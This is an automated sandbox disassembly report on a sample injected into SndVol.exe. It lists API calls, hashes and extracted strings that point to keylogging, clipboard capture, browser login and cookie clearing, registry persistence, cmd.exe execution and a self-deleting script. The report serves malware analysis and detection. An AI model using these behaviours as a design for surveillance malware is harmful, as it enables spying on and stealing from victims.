• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: c9d636ca90daca48e0c4ec3adf761b344abe739e9c78b648b2106ddf4aa81279
• Instruction ID: cbf04cd2aaa948bee58c867766e174b44f806db73b860135b090850767225504
• Opcode Fuzzy Hash: c9d636ca90daca48e0c4ec3adf761b344abe739e9c78b648b2106ddf4aa81279
• Instruction Fuzzy Hash: F301F776A457117F73255ABA6C8CCBBBFAEDEC2EA53160529FC04C6104DF618C01D5B1
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0292FEDF
• int.LIBCPMT ref: 0292FEF2
  • Part of subcall function 0292CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0292CEF1
  • Part of subcall function 0292CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0292CF0B
• std::_Facet_Register.LIBCPMT ref: 0292FF2E
• std::_Lockit::~_Lockit.LIBCPMT ref: 0292FF54
• __CxxThrowException@8.LIBVCRUNTIME ref: 0292FF70
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID:
• API String ID: 2536120697-0
• Opcode ID: 02be082eb7c3c494d42a36f688b48872b5951876dc522b87c179cc0a2a3668ef
• Instruction ID: 016c5a95695fca8f732cfe6558fd818a7c7c7b1cf1c5ed4350f049a00b9cdda3
• Opcode Fuzzy Hash: 02be082eb7c3c494d42a36f688b48872b5951876dc522b87c179cc0a2a3668ef
• Instruction Fuzzy Hash: 14117371900538ABCF15FBA4C5548EEB77A9FC1354B110469E915672C4EB309F4ACF91
APIs
• _free.LIBCMT ref: 0296F7B5
  • Part of subcall function 02966AC5: HeapFree.KERNEL32(00000000,00000000,?,0296FA50,00000000,00000000,00000000,00000000,?,0296FCF4,00000000,00000007,00000000,?,02970205,00000000), ref: 02966ADB
  • Part of subcall function 02966AC5: GetLastError.KERNEL32(00000000,?,0296FA50,00000000,00000000,00000000,00000000,?,0296FCF4,00000000,00000007,00000000,?,02970205,00000000,00000000), ref: 02966AED
• _free.LIBCMT ref: 0296F7C7
• _free.LIBCMT ref: 0296F7D9
• _free.LIBCMT ref: 0296F7EB
• _free.LIBCMT ref: 0296F7FD
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 355243fb2184dfd14d4a520184ead661c811c6b5a239ad49f5ae401f42ada6ba
• Instruction ID: 96cb22b2b15141d2bb23b879eae0c5c23c12bd03188204b2ee7b5b78c01c12bf
• Opcode Fuzzy Hash: 355243fb2184dfd14d4a520184ead661c811c6b5a239ad49f5ae401f42ada6ba
• Instruction Fuzzy Hash: 5EF0BD73948200BB8660EE5CF4C9D3A73FEAB807647684C09F45AD7941CB35F8D18E64
APIs
• _free.LIBCMT ref: 02963305
  • Part of subcall function 02966AC5: HeapFree.KERNEL32(00000000,00000000,?,0296FA50,00000000,00000000,00000000,00000000,?,0296FCF4,00000000,00000007,00000000,?,02970205,00000000), ref: 02966ADB
  • Part of subcall function 02966AC5: GetLastError.KERNEL32(00000000,?,0296FA50,00000000,00000000,00000000,00000000,?,0296FCF4,00000000,00000007,00000000,?,02970205,00000000,00000000), ref: 02966AED
• _free.LIBCMT ref: 02963317
• _free.LIBCMT ref: 0296332A
• _free.LIBCMT ref: 0296333B
• _free.LIBCMT ref: 0296334C
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: fd5b64d8184f9bf867598dc59e8f0b1fb90114cb1695879bfe5cbab466319fd2
• Instruction ID: f21638097bcdb8abae8a919ee908617465e8792613978b52e91f0c451a98b940
• Opcode Fuzzy Hash: fd5b64d8184f9bf867598dc59e8f0b1fb90114cb1695879bfe5cbab466319fd2
• Instruction Fuzzy Hash: 54F05E74C8E2219F9A02AF1CFD084B93BBDB7947703880946F41952664EB3A0C75DFA5
APIs
• RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 02932A1D
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 02932A4C
• RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 02932AED
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: Enum$InfoQueryValue
• String ID: [regsplt]
• API String ID: 3554306468-4262303796
• Opcode ID: 5b78ba0773ef180cca5bfa325c75aeee2dbfe0ecb36faab69daadd6c2c47028d
• Instruction ID: 0aa0532b2d715f24f556f5d2c22afd26ff0abedca0ebdfc7733f690867036364
• Opcode Fuzzy Hash: 5b78ba0773ef180cca5bfa325c75aeee2dbfe0ecb36faab69daadd6c2c47028d
• Instruction Fuzzy Hash: 39511972108355AFD315EB60D890DEBB3EDEFC4714F40092EB99A82150EB70EA0D8B62
APIs
• _strpbrk.LIBCMT ref: 0296D4A8
• _free.LIBCMT ref: 0296D5C5
  • Part of subcall function 0295A854: IsProcessorFeaturePresent.KERNEL32(00000017,0295A826,0292E5AC,?,?,029942F8,00000000,00000000,00000000,?,0295A846,00000000,00000000,00000000,00000000,00000000), ref: 0295A856
  • Part of subcall function 0295A854: GetCurrentProcess.KERNEL32(C0000417,?,0292E5AC,029942E0), ref: 0295A878
  • Part of subcall function 0295A854: TerminateProcess.KERNEL32(00000000,?,0292E5AC,029942E0), ref: 0295A87F
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
• String ID: *?$.
• API String ID: 2812119850-3972193922
• Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
• Instruction ID: 5e6cef39b6fdfc891ee6dedef2510dda5dd436cebc8774ec1fa2492497b763a7
• Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
• Instruction Fuzzy Hash: 6A518F71E00209AFDF14DFA8C884ABDB7F9EF88314F24416AD964E7744E775AA018B60
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\SndVol.exe,00000104), ref: 02962714
• _free.LIBCMT ref: 029627DF
• _free.LIBCMT ref: 029627E9
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Windows\SysWOW64\SndVol.exe
• API String ID: 2506810119-3942169294
• Opcode ID: 0fb455f0d214d44435f788d8396e6e42a715d03e1506d1d8eb5eb781650b1308
• Instruction ID: 68bfbf02130ad402c9bec5822fd6199376d9bde9d1fb1b0bf6b0c1ae2ee19eef
• Opcode Fuzzy Hash: 0fb455f0d214d44435f788d8396e6e42a715d03e1506d1d8eb5eb781650b1308
• Instruction Fuzzy Hash: 37317E71E04259AFDB21DF99D988DBEBBFDEB85760F1444A6EC0897200D7709A41CFA0
APIs
• CreateThread.KERNEL32(00000000,00000000,029299A9,?,00000000,00000000), ref: 0292992A
• CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0292993A
• CreateThread.KERNEL32(00000000,00000000,029299B5,?,00000000,00000000), ref: 02929946
  • Part of subcall function 0292A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0292A884
  • Part of subcall function 0292A876: wsprintfW.USER32 ref: 0292A905
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTimewsprintf
• String ID: Offline Keylogger Started
• API String ID: 465354869-4114347211
• Opcode ID: 34c78a9bd365c95a48614bc7635baa2b4ddce4cad9b423006f98f4ed7f19cf50
• Instruction ID: 04c6fede49ec922272697718721f940984dbb8fe632f551d11b3d3a1b5613148
• Opcode Fuzzy Hash: 34c78a9bd365c95a48614bc7635baa2b4ddce4cad9b423006f98f4ed7f19cf50
• Instruction Fuzzy Hash: 9B118AB65003287EF624FA35DC85CBF7B5DDAC12B4F40052DF85A16586DA605E1CCAF2
APIs
  • Part of subcall function 0292A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0292A884
  • Part of subcall function 0292A876: wsprintfW.USER32 ref: 0292A905
  • Part of subcall function 0293A686: GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
• CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0292A691
• CreateThread.KERNEL32(00000000,00000000,029299B5,?,00000000,00000000), ref: 0292A69D
• CreateThread.KERNEL32(00000000,00000000,029299C1,?,00000000,00000000), ref: 0292A6A9
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTime$wsprintf
• String ID: Online Keylogger Started
• API String ID: 112202259-1258561607
• Opcode ID: 363054efbd0ade6e5aa9facf3a4102e144bed0d7f5f78ede9d46fdd425318640
• Instruction ID: d4e50c159e6c7b794e6132d6c029d36420a64f334a1c800b2e73cfa5151e7880
• Opcode Fuzzy Hash: 363054efbd0ade6e5aa9facf3a4102e144bed0d7f5f78ede9d46fdd425318640
• Instruction Fuzzy Hash: 1C01F995B002693EF730B6758CCADBF7E6ECBC12B8F41042CF5462614ADA545D0D86F1
APIs
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,02924B26), ref: 02924B40
• CloseHandle.KERNEL32(?,?,?,?,02924B26), ref: 02924B98
• SetEvent.KERNEL32(?,?,?,?,02924B26), ref: 02924BA7
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: CloseEventHandleObjectSingleWait
• String ID: Connection Timeout
• API String ID: 2055531096-499159329
• Opcode ID: beed1795ae3d0f7fcca1a144e6a6d0b6af277a0431619e6320e220be0c89fdd9
• Instruction ID: eb0f8c93adc824592c5437a743d9e71367e1e2a03176576048f283554f90b035
• Opcode Fuzzy Hash: beed1795ae3d0f7fcca1a144e6a6d0b6af277a0431619e6320e220be0c89fdd9
• Instruction Fuzzy Hash: 06014775A84B51DFE726BB79CC454AEFFE9EF41614340092EE0E382A24CB609418CF52
Strings
• C:\Windows\SysWOW64\SndVol.exe, xrefs: 02926927
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID:
• String ID: C:\Windows\SysWOW64\SndVol.exe
• API String ID: 0-3942169294
• Opcode ID: d2607897ca5a91a94dcdd743bb0b6ba12ca2ab8dfd9ef9fc11e8d0b8ef52de5c
• Instruction ID: 06b32d3b1d2a8d6d56012d5309faa9ad505a84c94e3f2e2531fe83d922c7f8e0
• Opcode Fuzzy Hash: d2607897ca5a91a94dcdd743bb0b6ba12ca2ab8dfd9ef9fc11e8d0b8ef52de5c
• Instruction Fuzzy Hash: C1F09034E853319BDE042B7CA81977A368EAB90366F410865F556EAA58EB214829CB90
APIs
• RegCreateKeyW.ADVAPI32(80000001,00000000,029942E0), ref: 0293277F
• RegSetValueExW.ADVAPI32(029942E0,?,00000000,00000001,00000000,00000000,029942F8,?,0292E5CB,pth_unenc,029942E0), ref: 029327AD
• RegCloseKey.ADVAPI32(029942E0,?,0292E5CB,pth_unenc,029942E0), ref: 029327B8
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: pth_unenc
• API String ID: 1818849710-4028850238
• Opcode ID: d7dde67f549f7812fbe610afc8e85cf9c51f55caf35c560d83052d734b9070f1
• Instruction ID: 825dcb93c0414ee87ce4cbf2a56f2262c548bf4eef4f94d39cc000023a3880d9
• Opcode Fuzzy Hash: d7dde67f549f7812fbe610afc8e85cf9c51f55caf35c560d83052d734b9070f1
• Instruction Fuzzy Hash: DCF09071940128BBDF119FB0ED45FEE776CEF80750F104914F90296050E7719F18DAA0
APIs
• ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 029351F4
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: ExecuteShell
• String ID: /C $cmd.exe$open
• API String ID: 587946157-3896048727
• Opcode ID: 348de00abdfb99bde4418e9d3963577bed1b41558f30aadadb0bed76e0c9aa4e
• Instruction ID: fe49cdfc27c7f732cebec29a4d3d92b473625ff949264bf7f60881c272714ef8
• Opcode Fuzzy Hash: 348de00abdfb99bde4418e9d3963577bed1b41558f30aadadb0bed76e0c9aa4e
• Instruction Fuzzy Hash: 7DE0C970104310AA9608FA60ECA4DBFB7AE9AD0744B45581DB04B921A9DE64A91D8A15
APIs
• TerminateThread.KERNEL32(029299A9,00000000,029942F8,pth_unenc,0292BF26,029942E0,029942F8,?,pth_unenc), ref: 0292AFC9
• UnhookWindowsHookEx.USER32(029940F8), ref: 0292AFD5
• TerminateThread.KERNEL32(02929993,00000000,?,pth_unenc), ref: 0292AFE3
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: TerminateThread$HookUnhookWindows
• String ID: pth_unenc
• API String ID: 3123878439-4028850238
• Opcode ID: 016abb7ce2206921f0add546e2069cc5530a36fbf0c2a928caa4d79fb541caaa
• Instruction ID: b5413830468bbfd111a12b45a53d046f77338bc9549907bfff16493913befbd1
• Opcode Fuzzy Hash: 016abb7ce2206921f0add546e2069cc5530a36fbf0c2a928caa4d79fb541caaa
• Instruction Fuzzy Hash: 65E0EC76689226EFF3205F94AC888B5FBAAEB94299324087DB6C292114C6754C5CCB60
APIs
Yara matches
Similarity
• API ID: _free
• String ID:
Yara matches
Similarity
• API ID:
• String ID:
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 02924778
• CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0292478C
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 02924797
• CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 029247A0
Yara matches
Similarity
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• String ID:
APIs
Strings
• [Cleared browsers logins and cookies.], xrefs: 0292B8DE
• Cleared browsers logins and cookies., xrefs: 0292B8EF
Yara matches
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,02985900,00000000,00000000,0292C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0293B5CE
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0293B5EB
• WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0293B5FF
• CloseHandle.KERNEL32(00000000), ref: 0293B60C
Yara matches
Similarity
• API ID: File$CloseCreateHandlePointerWrite
• String ID:
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 0295810F
  • Part of subcall function 0295805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0295808B
  • Part of subcall function 0295805C: ___AdjustPointer.LIBCMT ref: 029580A6
• _UnwindNestedFrames.LIBCMT ref: 02958124
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02958135
• CallCatchBlock.LIBVCRUNTIME ref: 0295815D
Yara matches
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• String ID:
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,029942F8,00000000,00000000,?,029671B7,029942F8,00000000,00000000,00000000,?,029674E3,00000006,FlsSetValue), ref: 02967242
• GetLastError.KERNEL32(?,029671B7,029942F8,00000000,00000000,00000000,?,029674E3,00000006,FlsSetValue,0297D328,FlsSetValue,00000000,00000364,?,02966F91), ref: 0296724E
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,029671B7,029942F8,00000000,00000000,00000000,?,029674E3,00000006,FlsSetValue,0297D328,FlsSetValue,00000000), ref: 0296725C
Yara matches
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02929F65), ref: 0293B633
• GetFileSize.KERNEL32(00000000,00000000), ref: 0293B647
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0293B66C
• CloseHandle.KERNEL32(00000000), ref: 0293B67A
Yara matches
Similarity
• API ID: File$CloseCreateHandleReadSize
• String ID:
APIs
• GetSystemMetrics.USER32(0000004C), ref: 02938519
• GetSystemMetrics.USER32(0000004D), ref: 0293851F
• GetSystemMetrics.USER32(0000004E), ref: 02938525
• GetSystemMetrics.USER32(0000004F), ref: 0293852B
Yara matches
Similarity
• API ID: MetricsSystem
• String ID:
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0293B395
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0293B3A8
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0293B3D3
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0293B3DB
Yara matches
Similarity
• API ID: CloseHandleOpenProcess
• String ID:
                                                                                                                        • API String ID: 39102293-0
                                                                                                                        • Opcode ID: 993e0ef6540397181cd3c6ddbcaf02f6ec7ed90f4220d48bfe294eda576a5646
                                                                                                                        • Instruction ID: 9a503f83ecd7c192729bb185eaafd71311c23d595df641e2801a56ad21f5908e
                                                                                                                        • Opcode Fuzzy Hash: 993e0ef6540397181cd3c6ddbcaf02f6ec7ed90f4220d48bfe294eda576a5646
                                                                                                                        • Instruction Fuzzy Hash: 79F02D716442256BD312B6949C7DFBBF2ACDB84795F010865F651D2190FFB08C454771
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02923A2A
  • Part of subcall function 0293AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,02985900,0292C07B,.vbs,?,?,?,?,?,029942F8), ref: 0293AB5F
  • Part of subcall function 029376B6: CloseHandle.KERNEL32(02923AB9,?,?,02923AB9,02985324), ref: 029376CC
  • Part of subcall function 029376B6: CloseHandle.KERNEL32(02985324,?,?,02923AB9,02985324), ref: 029376D5
  • Part of subcall function 0293B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02929F65), ref: 0293B633
• Sleep.KERNEL32(000000FA,02985324), ref: 02923AFC
Strings
• /sort "Visit Time" /stext ", xrefs: 02923A76
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Similarity
• API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
• String ID: /sort "Visit Time" /stext "
• API String ID: 368326130-1573945896
• Opcode ID: c71d7ff7aea46d7b8056bc8438319e84f2928b4c3d92a6eed42dfa30e36aa881
• Instruction ID: a46a18ddee4b743d5bebf8142ff496474e6f21f7d23d94764693b61f6722e391
• Opcode Fuzzy Hash: c71d7ff7aea46d7b8056bc8438319e84f2928b4c3d92a6eed42dfa30e36aa881
• Instruction Fuzzy Hash: B1314F31A002285ADF18FBB4DCA59EEB777AFD0310F400069D40AA7199EE705E5ECE91
APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,02970B39,?,00000050,?,?,?,?,?), ref: 029709B9
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Similarity
• API ID:
• String ID: ACP$OCP
• API String ID: 0-711371036
• Opcode ID: 71c1b39ac67fbc614f78d6c356676e803c879e939a81f9c663939df0fd01cc7d
• Instruction ID: e83fb4ecfacc641055e4525e4bd4f6fc0e98550e6589f3cfa10849c0896fd755
• Opcode Fuzzy Hash: 71c1b39ac67fbc614f78d6c356676e803c879e939a81f9c663939df0fd01cc7d
• Instruction Fuzzy Hash: 25219262B04205AAFB34DB54C901BEBB3AEEBA4B64F564964ED89D7200F732D940C390
APIs
  • Part of subcall function 02953519: EnterCriticalSection.KERNEL32(02990D18,02995B70,02995BF0,?,0292179E,02995BF0), ref: 02953524
  • Part of subcall function 02953519: LeaveCriticalSection.KERNEL32(02990D18,?,0292179E,02995BF0), ref: 02953561
  • Part of subcall function 029538A5: __onexit.LIBCMT ref: 029538AB
• __Init_thread_footer.LIBCMT ref: 0292AEA7
  • Part of subcall function 029534CF: EnterCriticalSection.KERNEL32(02990D18,02995BF0,?,029217C1,02995BF0,00000000), ref: 029534D9
  • Part of subcall function 029534CF: LeaveCriticalSection.KERNEL32(02990D18,?,029217C1,02995BF0,00000000), ref: 0295350C
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
• String ID: [End of clipboard]$[Text copied to clipboard]
• API String ID: 2974294136-3686566968
• Opcode ID: 8d304054639d763696b5a4fb269ea87051106e4c538ec1318f2eb226f1dce144
• Instruction ID: 8f4b8bea60b50742779716f3ecf779d38fd250f8725c79f77e00f80400978f9f
• Opcode Fuzzy Hash: 8d304054639d763696b5a4fb269ea87051106e4c538ec1318f2eb226f1dce144
• Instruction Fuzzy Hash: EC217132A102299BCB18FBA8D8909EE777AAFD0320F500469D50667199EF706D5ECF94
APIs
• GetLocalTime.KERNEL32(?,02993EE8,029945A8,?,?,?,?,?,?,?,02934D7D,?,00000001,0000004C,00000000), ref: 029249F1
  • Part of subcall function 0293A686: GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
• GetLocalTime.KERNEL32(?,02993EE8,029945A8,?,?,?,?,?,?,?,02934D7D,?,00000001,0000004C,00000000), ref: 02924A4E
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 029249E5
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Similarity
• API ID: LocalTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 481472006-1507639952
• Opcode ID: 028fb54fbd0f8a270af993da6e352d6edef3b50945194789db377bf19b4296fe
• Instruction ID: a03215579a0a02d6ed70fbb6fb20668959246a416517c4215e1d716f2ab59ca2
• Opcode Fuzzy Hash: 028fb54fbd0f8a270af993da6e352d6edef3b50945194789db377bf19b4296fe
• Instruction Fuzzy Hash: 8C2157B2D082A06BD716FB7C98047BF7BA9ABD0328F88180CD44543259DF24552ECBE7
APIs
• GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Similarity
• API ID: LocalTime
• String ID: | $%02i:%02i:%02i:%03i
• API String ID: 481472006-2430845779
• Opcode ID: 42329bee73cca607ade77d728be976dc1ed4e737d46d177c056bf8a54ac13418
• Instruction ID: 56e9304398787bf1a6fed2227c099c611e15f6bed3273500d192d679fdb1b24b
• Opcode Fuzzy Hash: 42329bee73cca607ade77d728be976dc1ed4e737d46d177c056bf8a54ac13418
• Instruction Fuzzy Hash: 501160725082145BC704FBA4EC608BF73EAABD4710F44492EF88AC21A5EF74DA5CCB56
APIs
  • Part of subcall function 0292A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0292A884
  • Part of subcall function 0292A876: wsprintfW.USER32 ref: 0292A905
  • Part of subcall function 0293A686: GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
• CloseHandle.KERNEL32(?), ref: 0292A7CA
• UnhookWindowsHookEx.USER32 ref: 0292A7DD
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Similarity
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• API String ID: 1623830855-1496645233
• Opcode ID: 39ea4667b879e793f4b591b5da5bfefa45ef89da3d3f1ba0ebb87b48c23e306a
• Instruction ID: 829cf3ea38861064052e0e9de21dddb5d632206379bf1abbc732be8c52ac3fbf
• Opcode Fuzzy Hash: 39ea4667b879e793f4b591b5da5bfefa45ef89da3d3f1ba0ebb87b48c23e306a
• Instruction Fuzzy Hash: 7D017B36E042209BDB22B734DC1A3FEBFBA9FC1324F80041CD4821218ADB61595DCBD6
APIs
